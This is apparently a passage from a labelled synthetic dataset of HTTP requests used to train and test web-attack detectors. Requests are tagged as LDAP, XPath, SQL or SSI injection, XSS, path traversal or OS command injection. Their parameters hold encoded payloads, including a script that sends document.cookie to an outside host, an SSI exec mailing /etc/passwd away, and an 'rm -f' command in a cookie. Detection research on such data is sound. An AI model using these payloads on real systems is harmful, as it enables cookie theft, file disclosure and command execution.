Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: 7ilWt neoUeF=c3Eyhe
Referer: http://www.gbdi0toT.net/7nrIe/eoei3T/mneaZ.tiff
TE: trailers
Trailer: Connection
User-Agent: Mozilla/7.6 (Machintosh; U; PPC 2.7; ee-8q; rv:1.9.7) Gecko/66661085
UA-CPU: Sparc
UA-Color: color16
Via: ewNtt/5.8 210.56.216.165, 3.2 125.29.67.44, HTTP/0.7 www.aos0End.jpeg
Transfer-Encoding: identity
Upgrade: AhhELu/2.6, ney/2.3, r4p/4.0, nPq/8.1
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39957
Start - Id: 37822
class: LdapInjection
GET /i4nT_FE/snew/IAtsfisashr/sZg/Y2L9bw/f1e@Rvpa@rtFAc/jraen724nms/oLq3nqfg4.htm?7h8vTeJR4=ehdYX5_zulo&RwdUpQHVGae=dot%28&ja0=555%29%28%26%28objectClass%3Dloa%29%28%7C%28sn%3D++lot%29%28cn%3Dc+J*%29%29&rwYvsnan7rolntS=0484 HTTP/1.1
Host: 30.89.235.157
Connection: keep-alive
Accept: image/*;q=0.6, image/jpeg;q=0.5, video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 68.129.230.145
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="1"
Date: Sun, 15 Feb 09 19:29:57 GMT
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: oltCtuc@anfmtcot1m.gov
If-Modified-Since: Wed, 27 May 09 06:51:16 CET
If-Unmodified-Since: Wed, 23 May 07 20:23:35 GMT
If-Match: *
If-None-Match: *
If-Range: "hT0..GSfvGJaO_91M0"
Max-Forwards: 8
MIME-Version: 0.8
Pragma: McTS='3iM'
Proxy-Authorization: Digest uri=/newerY/iesL.bin
Authorization: Basic N2FkYmlyczp5bHFyb2VJ
Range: 09106-2,27777-,7807-
Referer: /ok7trl/nheaDas/hir3s/enxos/lsijt.jpeg
TE: trailers,gzip
Trailer: TE
User-Agent: 43Ika2 http://www.undntfts.fr
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/6.4 www.oc0eap.gif, nodupn/2.5 www.gatioer.shtml
Transfer-Encoding: deflate
Upgrade: otieS/1.0, omtz/5.9, e54a/7.2
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37822
Start - Id: 47094
class: XSS
GET /ti3psstile4eneeonfc/tYGZSG/Y@F.documentD1UmstylesT.shtml?sVxchild=5Se&onp=%3Cimg++++src+%3D%22+++livescript%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.an.com%2Fcgi-bin%2Ftotanestsi.cgi%27%2Bdocument.cookie%29%3B%5D%22++++%3E&tOsh=un&mySklau=%3DE&PbgsoundLv0@=oLPnNTMS&sBrminent=4432243&uyszbnb=stl7r2bnztEni&phtf=2279&rohraawm=hoxSlOH0O&smtnitidihh=mPI&ansbst8rx4iazrs=6426219 HTTP/1.1
Host: www.eorase.be
Connection: close
Accept: application/*, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 51.141.13.228
Cookie: aS7z9=r(oeaiametaR v?ueyid 
Cookie2: $Version="4"
Date: Wed, 11 Nov 09 10:17:56 CET
ETag: "NVqARtN0JGV.Ro_eNoEv"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Mon, 26 Dec 05 04:51:13 CET
If-Unmodified-Since: Tue, 25 Oct 05 24:14:40 CET
If-Match: "0ECjKyXp1Q4SzE_du"
If-None-Match: "V9.i.iQXnMQ7R7p"
If-Range: Fri, 17 Apr 09 08:14:18 CET
Max-Forwards: 279
MIME-Version: 9.8
Pragma: hrb7E='6H0irea'
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: Digest username="rtloRhh"
Range: 74-7756,9-
Referer: /udeoh/leaEs/okwoo/wnii/iaraeIr.html
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.0 (Windows; U; WinNT 0.0; 4s-od; rv:6.6.2) Gecko/70081288
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 320x898
Via: FTP/2.4 106.167.146.32:2071
Transfer-Encoding: deflate
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47094
Start - Id: 49746
class: XPathInjection
GET /asaiw7ozzayessexndne/hH9j_sQ9Ntf/2RR/hRuYg8GH.htm?io7hlmg=5su%40%2950dphps0dTSil+m1tMs&NeAmmh5g=we2hny%2Fa%2F4ysjic%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D8%5D++++%7C++wotrea%2Fyu4b%2Frht%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D256%5D++++or+++%27ah%27++++%3D++++%27&Utwbt18ld=cde%22fbf&9caaSjlbshoiuT=ny%24%7Crzi&q@ZscriptNOKAB=4403411005&uq6cvoLesa=70&js=54087 HTTP/1.1
Host: www.sl6e.ch
Connection: keep-alive
Accept: video/*, text/*, image/*
Accept-Charset: shift_jis, macintosh
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=5691
Client-ip: 24.134.122.55
Cookie: res3sooaraehel=hEcaiahhs1ooLx8tft;hle=061018814;wXorPoo=asy3p9kenhdd
Cookie2: $Version="4"
Date: Sun, 24 Aug 08 08:25:55 UTC
ETag: "sMfN7FOz1rBZfHdD2"
Expect: Cltc
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 02 Dec 07 23:11:16 CET
If-Unmodified-Since: Wed, 13 Aug 08 21:00:14 CET
If-Match: "fkxUqCNikiz4VpiCvm"
If-None-Match: *
If-Range: "l8UmGJBfikP0i.2"
Max-Forwards: 2
MIME-Version: 6.2
Pragma: smoomr='tSisist'
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -1702
Referer: http://www.oRexq0ei.ch/dteo/snhnNacr/nsu3s/e1chion9/lotrot.shtml
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: l4odlras (ppbGze; dOGuNFPx; x3ffiq7n_; rWRYl01rh; iNFG7P)
UA-CPU: x86
UA-Disp: 676,3592,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 413x0589
Via: FTP/7.6 www.Rs9a.gif
Transfer-Encoding: deflate
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49746
Start - Id: 38803
class: LdapInjection
GET /0uigTaotE/pE9b/Gac/ee0nt/gnkp-rhZh/eyNyK.GFJAM9ClLULdg/eirurjDfmemtuEeec/aN8Z.a3HsprfYH_fzBic/pE71z0Qg/T1c0sso/f26YypD6C1keYVd3bUFH/aihy6ptee.cfm?aPight3hz=nne&nnod=o1t&odOXopt3opu=ip0Vpr3fi&9nhw=%29++%28%7C+++%28displayName%3Dhad*%29%28name++%3Dhad*%29%28+++mail%3Dhad*+%29&edn4ijdd=a1N%40LssHTU&Eamn=4ktcEisi&hheroaroiIntafc=anuado%5D&htpasseX0DlKlEZN=wp--eoRtna8&na4ud=aBqg.LsEw2tr&odoip=4618056528&ZGZdi=u-0H-A_aJe9P&piaku5eirsEg5ci=u4ehlnr HTTP/1.1
Host: 39.230.146.221:81
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.7, gzip;q=0.7, gzip, compress;q=0.5
Accept-Language: ltb-rt6, eam-hfol
Cache-Control: no-cache
Client-ip: 103.147.207.153
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="055"
Date: Mon, 16 Jun 08 05:28:16 GMT
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: yRoml@orAqOa.ch
If-Modified-Since: Wed, 21 Apr 10 23:24:20 GMT
If-Unmodified-Since: Thu, 11 Mar 04 20:22:53 GMT
If-Match: "ZzBZb2KUg_iTlkV@"
If-None-Match: "ysKomA0DHbx6d0WQ"
If-Range: Mon, 30 Jul 07 08:42:50 CET
Max-Forwards: 8
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 89831-,-364983
Referer: http://chkeBtFi.st/a6gb/eCr1b/dgtho.asmx
TE: deflate,trailers
Trailer: Accept-Language
User-Agent: cie3/1.9.6.3.5
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/3.1 www.tUenorwu.shtml
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38803
Start - Id: 41790
class: SqlInjection
GET /vtn/3N8cmdchbKnrx/ezEtuiu3Bda4/rpotfaa6/iO0rbme9BJY_/sm1vjWlv/LzLmXEkn1toh/aKQ@.jpg?pbodyf.HYhQ0JC=ehdiframeq7ph%2Fort%25ub+xKwnfi&eadyvmei=10134628&3e=ghIr&slo=509594892&patoleDa=formnzaeb%2B&ncits=OR+++++%27ud%27++BETWEEN++%27R%27++AND+%27T%27 HTTP/1.0
Host: 73.140.218.27
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.4
Accept-Encoding: gzip;q=0.8, identity, identity;q=0.6, deflate;q=0.5
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 112.56.209.56
Cookie: ettsealtd7ire= hrq;iperlbp1b.=ecaH0
Cookie2: $Version="3"
Date: Sun, 31 May 09 20:18:04 GMT
ETag: W/"ZXEXElr@0LpV3YJGdbm"
Expect: e813nRi=Rjetwieo;hsuvez=0ens
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Tue, 30 Jan 07 01:15:39 CET
If-Match: "8Pum.frRG9Mt@OdzqDl"
If-None-Match: "EPch6cTst6aE8s6O8W"
If-Range: Wed, 25 May 05 13:40:47 GMT
Max-Forwards: 994
MIME-Version: 3.3
Pragma: ethitl='se1lbtU'
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: nkoe63 beoeYB=Norx
Range: 82059-
Referer: http://IouLrt5.uk/iS83nt/oawdov/bcEr1hh2/AiesginT/s7hhe.mpg
TE: gzip,trailers,deflate;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/4.1 (X11; U; SunOS sun4u 6.6; ai-hd; rv:4.7.2) Gecko/55847472
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: gzip
Upgrade: ooo/9.2, 8pcmnn/1.5
Warning: 328 www.aeePtha.gif "090pevlaxa3e8csta7a" "Fri, 15 Sep 06 14:42:50 UTC"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41790
Start - Id: 45854
class: PathTransversal
GET /V0dlXE/nxd/r@FS.RvG/e2kS-sl1FtmH-RL9d/BR475FoO8/tvK_ViKQO0/a7/hte5EBsdqdhduunri.sh?pic86e=58&crdsoGnvo=utn&ntimaahoteifisn=evalso&artS4qTfe=h.MQKT&aeoOoeNeu4=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&4bncAs=wnt&hlte=0125376412&snh6=ij4G&e0=lefromup&imheeicni=ef8&gnAiui2=Tnr&od=71956380&e7aott=%2Fphpa&vAuecgptnhx=0TWyb&insertgreplaceb=yFSH HTTP/1.0
Host: 101.104.205.216
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 136.24.127.56
Cookie: rO=Sthni;ie2ehuCat=inputebjldocumentn rpasswdTwkasmea;mbCessdhtNH=%b;Eaohb=8ohn1uai;0imh=76
Cookie2: $Version="19"
Date: Sun, 24 Jul 05 18:41:07 UTC
ETag: W/"yEEW3T@Wp7SFTD9Qt"
Expect: rh6tfy
From: nty1riog@emdl05l.uk
If-Modified-Since: Fri, 03 Apr 09 01:17:15 CET
If-Unmodified-Since: Wed, 14 Mar 07 03:22:03 GMT
If-Match: "x3sUwmE7bx0ZAzGT4e2e"
If-None-Match: *
If-Range: "HQHG3Sit@CtUCU1S5lhh"
Max-Forwards: 214
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/weir/iIesdqv/isbaatja.nsf
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 678930-,927-233,15507-
Referer: http://www.hweSmhsf.com/ihooir9L/rsua3als/qoev.gif
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/2.1 (X11; U; Linux i586 2.2; e0-Bh; rv:8.8.0) Gecko/18848795
UA-CPU: Sparc
UA-Disp: 318,072,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: FTP/9.7 196.220.219.227
Transfer-Encoding: xRlUa
Upgrade: oaae/2.2
Warning: 787 245.252.99.223 "dmrosab" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45854
Start - Id: 46328
class: PathTransversal
GET /ij.AGqhQAzmfMiNNw/xml0n/xJF_yO1X.exe?agOaypGrqa=e%3A%2F.htaccess%7E HTTP/1.1
Host: www.iteoyut.de
Connection: letgL
Accept: */*
Accept-Charset: iso-8859-4;q=0.4, euc-tw
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 146.96.8.202
Cookie: c5op=rlhwinntt]w3En;taerri5t8et7me=tGKmNLY@mKi;-UHFL=b75lxZPK;IOe6eatrhusiihi=mWLiS87k
Cookie2: $Version="825"
Date: Tue, 22 Sep 09 09:25:59 GMT
ETag: "s6LC.gUWV6WtoYK"
Expect: 1hasIgDs=ebbe;d2yieais
From: sgtDwB@5isge.ch
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "Tc43xM5D.37nERrwv5mJ"
If-None-Match: *
If-Range: "slnPTwfk7G9XoLL7KF0S"
Max-Forwards: 222
MIME-Version: 6.3
Pragma: idnoier='4fo2ls'
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: NTLM aW9ybHJlMnI3aG9lZWh0c2NpOWFtZXJzYW5yS25waXJw
Range: 595-7160,98-,4-961
Referer: http://EhrOr.ch/orUseat/0asaItsq/uuYmj/rtefDe.mdb
TE: trailers
Trailer: Max-Forwards
User-Agent: r2lmqzaKU@ http://www.wid3Tn.it
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 598x8169
Via: 3.7 www.ih8e7.js:231, 1.6 90.219.189.230, HTTP/0.1 245.240.240.116
Transfer-Encoding: tlxupn
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 84.224.165.18
X-Serial-Number: 5744439401
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46328
Start - Id: 36883
class: LdapInjection
GET /n4hnuopuo0a/eaieg/aD7OKON_eYan/uselauhscaIPetrket/I4-gNVggM/RLav5w.P6@/eondmiyhq7zel.htm?one1fb9e=eimg&ao4iuziultnNu=speessAtqaN HTTP/1.0
Host: www.rpOiree.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=2
Cookie: h2viexitIwNe=tmqdi;eNus5h=tpKPT2;baenh0Orcn=lnrT libaametacIlinkunion;ocFncnt;du8OmijknDoe=)( |  (otths=1sw*)
Date: Sat, 13 Dec 08 19:08:12 CET
ETag: W/"KCI@kN0BmfRCknwK6xXS"
From: god7on@cdae.de
If-Modified-Since: Sun, 26 Apr 09 18:48:01 GMT
If-Unmodified-Since: Sat, 17 Apr 10 20:34:08 UTC
If-Match: *
If-None-Match: "-gJecFli@mB4gOb"
If-Range: Fri, 09 Oct 09 19:00:34 CET
Max-Forwards: 034
MIME-Version: 0.1
Pragma: 691ssh2='e'
Authorization: Digest algorithm=kaehtteo
Range: 0197-,73847-461778
Referer: http://www.7nittkHs.ch/eitraw/lth6oyp/ezeogqai/rI3tnbta.swf
TE: trailers
User-Agent: a_Nf3J1Odi http://www.cglnwoli.org
Via: 3.9 35.41.75.226, 9.4 www.snechnne.gif, 2.3 www.TsoeoEa.png
Warning: 873 www.uz4i3.js "138m9djRanlflt" "Tue, 02 May 06 22:00:02 CET"
----: ------------------------------

null

End - Id: 36883
Start - Id: 40088
class: SSI
GET /aHmVUpI/i@ceKV-sZSlcmgMssc/eu.5yY_ZTPDp-/86i5BNQy6D/eMcrtgoet/iaMj/fOYd3@3rvewrHEwS2DE/aEoEm1ihn1jftn.php?wAO5n=nf8e+jieon&uaCt=hA-mH&-ZVlkephpvlPB=6&se9nnsjO5aiaei=781&ddii2rT=21&ri=894&knr=279&dny=hnn9&dnte1etr4o=motsenhronnx&sfhko4a2o=ka%24+&mixgjSa=ndlynhnsxmlEO&tqdnateunhisege=%25e%5Dtunionad4g+dbp7&Taq=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fmail+++mnqei.com++++%3C++++%2Fetc%2Fpasswd%22--%3E&ltaeacu1cs12u=otza HTTP/1.0
Host: 27.84.37.191:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: na-dnEnn;q=0.3, dno2bs1-nTr1se;q=0.7, Mts-pl
Cache-Control: no-store
Client-ip: 139.170.207.9
Cookie: tre9a=nhy
Cookie2: $Version="509"
Date: Tue, 19 Dec 06 18:41:23 GMT
ETag: W/"_Xa4edX9KDjWHxZa1Le"
Expect: 100-continue
From: eolu8j@aioa.fr
If-Modified-Since: Mon, 10 Oct 05 20:44:53 GMT
If-Unmodified-Since: Tue, 10 Feb 09 23:31:16 GMT
If-Match: "amwBYwcRcUcQYb0qO"
If-None-Match: "fk8cu4sMfGdoBgsFDG"
If-Range: Sat, 25 Apr 09 22:13:54 CET
Max-Forwards: 73
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: eke5at o9mi=ikHts9eh
Range: -170
Referer: /eKelnepw.pl
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.7 (compatible; Konqueror/9.7; Unix; n7tonJtie; mtPaoeo)
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0944x596
Via: FTP/5.9 www.rpWeNT.gif, 2.5 www.eoko.png
Transfer-Encoding: identity
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40088
Start - Id: 36844
class: OsCommanding
PUT /vAas/stslpZUCLYc.lMkBVJ3G/dDt2seedylEh/clrdltonrwceur6e/MemcrleiaWsoap9/nsiaRiohot9isnftts/tj/R6ZQOpsO3YmetaNU/iAdGW.shtml? HTTP/1.1
Content-Length: 138
Content-Language: sihh,ssr
Content-Encoding: compress
Content-Location: /hrrtnkt/t9ciawl/oots5oli.mspx
Content-MD5: aXJ1YWJmZ1V0aGFvVGhvYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Sep 07 13:23:05 UTC
Last-Modified: Fri, 05 Dec 08 13:32:21 CET
Host: www.bhWcssar5.it:858
Connection: close
Accept: application/*, application/*;q=0.9, image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, deflate, identity;q=0.1, deflate
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 114.22.10.232
Cookie: iRvtTtadtoreit=n4hil4geutcrmr;arayiw7=9;4C=lrldtxtahrsoAr;dr7NIztlo=teoz;atn=rm   -f   /tmp/1G|;aii=446656
Date: Mon, 11 Feb 08 01:33:42 CET
ETag: W/"gkyL4vPt.PB_pnK"
If-Modified-Since: Tue, 13 Jul 04 03:43:39 CET
If-Unmodified-Since: Fri, 04 Jun 04 05:09:34 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 24 May 04 09:24:50 GMT
Max-Forwards: 7
MIME-Version: 6.6
Authorization: Digest opaque="dnih"
Range: 31396-6586
Referer: http://ao4jtldi.gov/adetaeiC/hTNjeNt.jsp
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: ahtplttl (th7hFvl4P9; hQfQ6Ax; yxRUk_Jt-b; u@Jf@lIKu)
UA-OS: Windows NT
UA-Pixels: 3024x796
Via: tEIg/4.7 46.113.19.77, HTTP/4.1 178.40.165.133, HTTP/4.1 www.azZvc.css
Transfer-Encoding: compress
Upgrade: p6mnt/9.8, ret2h/9.4
X-Serial-Number: 8834777975735637485
~~~~~: ~~~~~~~~~~~~~~~~

0sdj6n=enbESd&leoasuieiytz=wQXH24K&onvnRhnjnodor=esvQgQOgGX6E&zsTY=3&gehcotltc=a&pJexecX2AGhAA=dlikey&rIc7tnph-=H0eE&w6w8Fy5iUz=:yer]t

End - Id: 36844
Start - Id: 40119
class: SSI
GET /3cCz7Mlmv/szAv0YHRVHFw6/ftpwgk2oo.TeGj8/ei7/oMAvbq1aYtsAAge_q/mY2/eW_AvcoeYKgDzBCE5A/2eXaK-Ep8T_/sYIws@fmWZ0KJ/8r.html?gdrohh=dllnoh&asIo1thn=u%25ta3rUCe&te=t+bN0ioTe&taywl=s+txsmeu+mgupdate6&riup=or&eo8imlk4Ela=mme&Uenh=ruu&t4hioo=4882245&nowodkRdcssmnh=%3C%21--++%23exec+cmd%3D%22%2Fbin%2Fls+++-l++++%2Fhome%2FenyGnn0xa%2FhsgU%22++++--%3E&rsiS=%26s9wp-Eeval5discriptat8li%29select&kdlce=eZUK9z&eosSDtjt=Xseeseellhri&sjpect=rce HTTP/1.0
Host: 13.247.127.187:80
Connection: keep-alive
Accept: audio/basic;q=0.0
Accept-Charset: iso-10646-ucs-2, windows-1251
Accept-Encoding: 
Accept-Language: owxrst-knrsi;q=0.9, ae-a29
Cache-Control: min-fresh=6
Client-ip: 149.0.44.161
Cookie: neuMdlyvlwnI=1stasH8seg/3setsdo;e3iup=lW.P;reuo5littjr0=fnlhewmh
Cookie2: $Version="3"
Date: Fri, 08 May 09 14:46:41 CET
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Fri, 18 Nov 05 15:12:59 CET
If-Unmodified-Since: Sun, 27 Mar 05 04:20:16 UTC
If-Match: "evoRPiZxEK_61Fssz3"
If-None-Match: "E9KpFInStExR8VetqN"
If-Range: Thu, 13 Oct 05 07:24:31 GMT
Max-Forwards: 98
MIME-Version: 3.4
Pragma: q='fnr'
Proxy-Authorization: Basic d2VuYTE1aWE6c3lhYzY=
Authorization: Basic bW50cDdEbjpMc2dlaWU=
Range: 01784-577,9-7,8678-
Referer: /4Atngsr/i8ctee/nsntaEyh/soculre.php
TE: chunked,chunked;q=0.6,gzip;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.0 (Windows; U; Win98 6.1; g4-ne; rv:8.9.4) Gecko/62808136
UA-CPU: 68000
UA-Disp: 8182,5910,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 768x931
Via: yiref/1.2 www.rtes4u.htm, z14w/3.8 www.stliti9i.tiff:95164, 6.4 www.as5itv.tiff
Transfer-Encoding: compress
Upgrade: hftdus/4.4
Warning: 530 www.keiqse.jpeg "tjsEot3eeoicdet6rlc" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 3431591
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40119
Start - Id: 49141
class: XPathInjection
GET /eHv83catQxghHlh.php4?Sc2CEY_UscriptavJ=6&7e=ltiikoo6lfmzyis2&heutm=r0Anc2&v4htpassn=3ese3b%2Fub%2F54f%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D++++or+%27l8qlhezh%27+%3D%27&Lop2=0&xyhwSsxqGs2ttmC=%3Feoe-&ZsdJ=ed%24&lsyz=507 HTTP/1.1
Host: www.nTe4Tewz.de
Connection: keep-alive
Accept: video/mpeg;q=0.1, text/plain;q=0.3
Accept-Charset: us-ascii;q=0.0, iso-8859-15;q=0.9, iso-8859-2, big5
Accept-Encoding: deflate;q=0.8, compress, compress, gzip;q=0.9, identity;q=0.6
Accept-Language: *
Cache-Control: max-age=100
Client-ip: 97.222.173.73
Cookie: esedaRrGsrLeT=leee7|hrrc;40i=n;mltyFusraiscript9i
Cookie2: $Version="925"
Date: Tue, 24 Jan 06 06:43:04 UTC
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: hstr@4dfys6.de
If-Modified-Since: Fri, 01 Oct 04 23:08:06 CET
If-Unmodified-Since: Tue, 15 Jan 08 11:37:13 GMT
If-Match: "1NJ1GOIPBSxqN-Ou"
If-None-Match: *
If-Range: *
Max-Forwards: 4609
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM aXBhOWVraXQxZXJkckVhZXgwVE5hQXhwc3RzbHJ0b2VsZnN0b25jZWFv
Authorization: Digest cnonce="eoetai"
Range: 6-
Referer: http://luhnc.biz/he5wP/tavsze3/ewEroi7/nodn9.js
TE: deflate;q=0.7
Trailer: Host
User-Agent: Mozilla/0.7 (Windows; U; Win 9x 2.1; sn-pe; rv:5.5.5) Gecko/45104650
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 793x723
Via: 5.3 www.Ryeahcn.gif
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49141
Start - Id: 47073
class: XSS
GET /aojnzhnw.pl?nWeeeMceRdu=ua%400unmail%3C&9NaeItEatventD=obx&euo0rra5eddf=eHt928&0p2tenq=64905&ejeuoeioTtnd3Re=7494015&KyoBrPEQ=+&hisuansnaStv5=hsikr8bs6kisduuot&nidn03qk11ott=HIi6cwe4r&ia=7772235&u7Cesr9o=beddi&kvfSi=%3Ca+++href%3D++++%22+++about%3A%3Cs%26%2399%3Bript++++%3E%5Balert+%28%27frontc%27%29%3B%5D%3C%2Fscript+%3E%22+++%3E HTTP/1.1
Host: 114.217.103.42
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: zij-s5igen
Cache-Control: no-transform
Client-ip: 217.116.65.138
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="13"
Date: Wed, 27 Jun 07 11:03:25 UTC
ETag: W/"sdelRvzyys61VAh"
Expect: yshaae=hl6e2eC
From: ea8Dl2@Editdvt.it
If-Modified-Since: Tue, 06 Jan 09 15:26:36 GMT
If-Unmodified-Since: Tue, 12 Feb 08 14:22:48 CET
If-Match: *
If-None-Match: "uF6UIoGQBhrikBCxgT"
If-Range: "kBjFYFwZ1AJT6vQ"
Max-Forwards: 6
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Nnphc2l0b2hlbWVJc2k2eGh0cmUyYThvb3NUcndzZXJj
Range: 44535-
Referer: http://www.prstdynt.de/lsnIlev.shtml
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Via
